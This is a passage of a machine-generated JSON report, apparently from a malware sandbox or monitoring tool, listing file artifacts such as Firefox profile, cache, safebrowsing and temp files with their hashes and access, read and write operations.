"cf64d8f56f88c0232b1aee4150d3480e76008ef8", "sha256_hash": "3eac792562300288986dacc00cce93bec2873aa2727b3676ffb9d371e11207d8", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\parent.lock.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\.metadata.4035", "hashes": [ { "md5_hash": "5b7014469b38ccb7195dae29fa8ad4e1", "sha1_hash": "f903a930195b60e289f6abc2403a6c6e47e106cf", "sha256_hash": "c230b613368895a42fe5c009b63a80e8b9346b4f7712b313868d6ea6326e2913", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\.metadata.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.4035", "hashes": [ { "md5_hash": "9ad5ee48fc734fab6e97401208e1e8da", "sha1_hash": "0e99f7e4ff4e7d30f6bf668a3dc40e7c57ae97a9", "sha256_hash": "154d3a906ea0c25907f82cc049815f986c444f9b45013d6ea549b3dd6100ba62", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2635.tmp.4035", "hashes": [ { "md5_hash": "149a550984bbb76d5a52897b39893287", "sha1_hash": "429e061c6f1973cad0ab9b5419640409e8659779", "sha256_hash": "938bc773e3a74abf0682baa11516e07514c91840a2ce08c274b7daa9c73664db", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2635.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst28B4.tmp.4035", "hashes": [ { "md5_hash": "3889dd6c5e649a56f64282ed3ea9ea25", "sha1_hash": "69b70805d064ee4c697dbb354aa3395dc4b657ab", "sha256_hash": "cb5b6f812df2708df4ddc06f93206c342eff19b37f5a63143579411c8e31b1d9", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst28b4.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2960.tmp.4035", "hashes": [ { "md5_hash": "b8b9752b35b51efcae407d9665736ee3", "sha1_hash": "f076f1c4ae1ac3744717d6dbad139baeea6d1e8b", "sha256_hash": "cac9203f208e01ef103d33fcd7bf9e162f930bf815b371d0b4c56077c355d2d4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2960.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2F3A.tmp.4035", "hashes": [ { "md5_hash": "09e0fd787b7c8be20ea7f29d2efba5f7", "sha1_hash": "115301a5cceb8909c7643905a77c69e199eb9e55", "sha256_hash": "1eaf62717ace3fe73d1f76b0f0f44db6c4a223f84e872c37852f23c236eca5fb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2f3a.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst4105.tmp.4035", "hashes": [ { "md5_hash": "cb18331d5c14888b413fe39795277a9e", "sha1_hash": "1c0cd71c83c98fe21a739029d8c16c10255b8859", "sha256_hash": "0e9ab1cfe335e636091297a4c6b4cf1a349c7a7c83512cbcdc3e1870a3407770", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst4105.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst423D.tmp.4035", "hashes": [ { "md5_hash": "d955136674aab1f2654c8744050da94d", "sha1_hash": "608f61f6dbde2792033936ae988cb814f946babe", "sha256_hash": "9da752d868e3d844745d2d923153c59c683d21ee282c60302077aff74a76e8e6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst423d.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst4558.tmp.4035", "hashes": [ { "md5_hash": "f433140f5e888b4182bd2804c1a646e1", "sha1_hash": "c6815b4d3cc76d2d0ddc57c2281c18e3f56dbf89", "sha256_hash": "32d50d668dac88e7ab21cda68b1ca7a8a983c13bd1c42389fd3af90223ade3d6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst4558.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst47F7.tmp.4035", "hashes": [ { "md5_hash": "1567cbcb62ad49f7d54e2f573b270c07", "sha1_hash": "e88e7d519bf88974255f5f666fd4b49b04571fd9", "sha256_hash": "89fba1eaf0b29db4e9356aab2723713b02f476f536c36f5e8001ac22a61ac266", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst47f7.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst531E.tmp.4035", "hashes": [ { "md5_hash": "88e9df3467882291ca396a66a40e9364", "sha1_hash": "b5e7c389c5633b4aa2c2b2f8710b98e53a077b63", "sha256_hash": "61215670fa920629eacf670b802853d69fea0a345df569901f79db0dad21c4bb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst531e.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5511.tmp.4035", "hashes": [ { "md5_hash": "f92e870a2b72ff6b511c7102da74c4aa", "sha1_hash": "74abb7e60560b2608fdebb984fd524bb4ac0c010", "sha256_hash": "fcb3467a5044cbd56445e901f5eaaaa10bc6361aa5950e1e1a82e78ea2d56445", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5511.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5994.tmp.4035", "hashes": [ { "md5_hash": "b62b670449cc6b937a5fdec9171890fc", "sha1_hash": "6165595e13baa3090d72ad0174709f771b72447f", "sha256_hash": "62a2a2c1c8750511066077dcaf6f02e0481b98037a762699aaea024dd2b2f8e1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5994.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5CBF.tmp.4035", "hashes": [ { "md5_hash": "e0e823c4783951bfc8ad2c089d117f6c", "sha1_hash": "c33db62f544f1975b2a346f96c72a0be24422896", "sha256_hash": "f3444ef8be4214617d3b626a8c1d03e4317d8656240cd08c80b26bd1e7a7670b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5cbf.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7953.tmp.4035", "hashes": [ { "md5_hash": "baf0c37154a75c18b469c238ab68b4d4", "sha1_hash": "540bae9b04af9cc6526fcd54b3664e63e0204486", "sha256_hash": "0f0c49bac2ed9915ff240287a9c28ed5aa801d5fa1888d4a8219abc73028d4ee", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7953.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7F0E.tmp.4035", "hashes": [ { "md5_hash": "1595c1fd12efd81e300b0b316c2a7f80", "sha1_hash": "ff94141e49ffdea1f5123869c283465db59b15b6", "sha256_hash": "d4cbc9d5bbc81b1aa4fddb3a186b321474a4177cf02d1e1cef53e97d2877d67a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7f0e.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7F4C.tmp.4035", "hashes": [ { "md5_hash": "a959ff300a430f682f53826748c04b28", "sha1_hash": "a214da01fd62d8ba73b62a3bee02e33bc9eb70aa", "sha256_hash": "5e84781772d9d8ea5fe7f41d4d2aac4623c36f6dd88f33243531a54189312c02", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7f4c.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\CVRC37D.tmp.cvr.4035", "hashes": [ { "md5_hash": "484e65ba897c3ffaac6b21e0da819d7a", "sha1_hash": "d6e8c7f7c136d4ca380ef553cbe6ae349db220b3", "sha256_hash": "6c4d812678347239c53c4a391b4ccbc799d2972ca707698d9417e394ba982efb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cvrc37d.tmp.cvr.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\CVRC503.tmp.cvr.4035", "hashes": [ { "md5_hash": "578d433fd7e8cc233b9c54b82a56a206", "sha1_hash": "429acb9273f865a8556f4d5b5b7d6ad3b3900488", "sha256_hash": "c6fe2668014d09c695bf685bd72b084329eb5bed11463784745c8b9b3096d4e7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cvrc503.tmp.cvr.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RD8CF3.tmp.4035", "hashes": [ { "md5_hash": "cfbb6b9e0e523bc34f28085668ecf75d", "sha1_hash": "7b667c824155950f7eb577150a12e81f72160c1e", "sha256_hash": "638a65e56855727763adfa454672ae610a49c42841181810dac42bf50b573f80", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rd8cf3.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\uk\\messages.json.4035", "hashes": [ { "md5_hash": "fea47969cfef20b7a2c2f13f37f7e8c8", "sha1_hash": "33551865760306767cafb03964ce78edb6c023aa", "sha256_hash": "4e55bb8b6c43333a26c25d52400eb1eca4426424e518aa5d5117f73c305384f2", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\uk\\messages.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.sbstore.4035", "hashes": [ { "md5_hash": "9bc2fbad96b13bc14533a7ac3481f380", "sha1_hash": "46c5c7c565a0032954b4ea9e5000e3c72b21b596", "sha256_hash": "414d937bb34a0c5c1c7232f9aaa569516f25f8d4e593a3301f96d1dfbff63394", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.sbstore.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.cache.4035", "hashes": [ { "md5_hash": "46c6f9d9394a473408e1e5670cd6fb91", "sha1_hash": "4e65501612b3294b503fd89c2b1030fb9fb0f060", "sha256_hash": "7218420f11d2f06a21d42f3c5191147a0d7e3ffe7627e748a904252174fc1b0e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.cache.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.cache", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.cache", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.pset.4035", "hashes": [ { "md5_hash": "fcfe191acb9be70da2690a82eb23b082", "sha1_hash": "6211de4c86223359a1fd9fc5f01d4ded6e4249f6", "sha256_hash": "c9886595d795ee09df9b957660beb7c983cb40b45113b26c9770c2a3b0d2a120", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.pset.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.pset", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.pset", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.sbstore.4035", "hashes": [ { "md5_hash": "8959f5e244c1a70a28095d23d9e9d003", "sha1_hash": "be77258579eee53bfc07d30a65fec42997659714", "sha256_hash": "73d3e2a827e52df97f69f5fdc8bbd2e316ab26ed52b1dc2250edf77d3c7587f7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.sbstore.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.sbstore", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-malware-simple.sbstore", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.cache.4035", "hashes": [ { "md5_hash": "ccd484072158c92840a38c0b7196e3c9", "sha1_hash": "15b2fcde68f95487e1c3590cb665fd6db33a2eb4", "sha256_hash": "8137a75d300d5ddd7f84bb0010fd1d3bb364806d08480127403604b307c743d3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.cache.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.cache", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.cache", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.pset.4035", "hashes": [ { "md5_hash": "f14c093eff6ed6672cd28b89f014b41c", "sha1_hash": "84430a468e014fdff4eec2d25d5469075d25e1a0", "sha256_hash": "dc7c094e12b89e0e3d81c6ae5092c40d00aac24611f0170fe4b548eb4f04d70d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.pset.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.pset", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.pset", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.sbstore.4035", "hashes": [ { "md5_hash": "a4331a5cfbd3798213f8f97bd1cb8c06", "sha1_hash": "bce304bc3f8517fb468e5f3101d9dfa51fa3abe5", "sha256_hash": "1c72367a887f7c3e759a3696232191500e1b57670a64a27a07792dd02ae63e01", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.sbstore.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.sbstore", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\test-phish-simple.sbstore", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\OfflineCache\\index.sqlite.4035", "hashes": [ { "md5_hash": "4550680d2b011e5abd4bcfe0fa446725", "sha1_hash": "79c3cb32f742b6e7950bcbff136fd61a22f79d16", "sha256_hash": "ff79a14efb93121b48d4fa3c9ac349449a01d0aeea885d2a62ceb565bc20680c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\offlinecache\\index.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\OfflineCache\\index.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\offlinecache\\index.sqlite", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_001_.4035", "hashes": [ { "md5_hash": "28d83c9ff5df42b60b5a83823becacac", "sha1_hash": "600ec16174497375fafa3f33df71a61b3e04890c", "sha256_hash": "da4468e5b2af778f99253b84b9463e667dabfc9dac61c4ff2cf8c72a5eca41d1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_001_.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_001_", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_001_", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_002_.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_002_.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_002_", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_002_", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_003_.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_003_.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_003_", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_003_", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_MAP_.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_map_.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\_CACHE_MAP_", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\_cache_map_", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\A2\\70853d01.4035", "hashes": [ { "md5_hash": "d2a6abd4312d5d22f4236b2b5f062a46", "sha1_hash": "3f3702eb795d29c1ad275beb782371a6157211df", "sha256_hash": "57dc4627ab6d8f65f114b270deca6f08c2e9304ab8e3a8811c465ed6f56dd877", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\a2\\70853d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\A2\\70853d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\a2\\70853d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\94\\C3F14d01.4035", "hashes": [ { "md5_hash": "82b63fb4f52809e67d98705287219c7c", "sha1_hash": "4bdda72f4223781c2bec1e2e9ca20569cf711650", "sha256_hash": "a74140b462a36d5671506a6aee96f4c32fb14d7729a472baf9274565c1ec1547", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\94\\c3f14d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\94\\C3F14d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\94\\c3f14d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\23\\7E0FEd01.4035", "hashes": [ { "md5_hash": "7c86e06806ad8037645b4601a845baa6", "sha1_hash": "1d18d1119704fd48f490ff669307145a15f7c24f", "sha256_hash": "00e47f9d8125f5b8e79a1b368a1a62d765e96143b82df234634def2db10936b2", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\23\\7e0fed01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\23\\7E0FEd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\23\\7e0fed01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\E9\\1A006d01.4035", "hashes": [ { "md5_hash": "744d1f071cef2745ba66b48fcae18d29", "sha1_hash": "df0600a65df3145a65458c107e386dc5c985a961", "sha256_hash": "ecb8d2a0e570cf6c5913e170a29d86130b8ce42b5cbc3de2be43277e7bf5bf76", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\e9\\1a006d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\E9\\1A006d01", "hashes": [], "norm_filename": 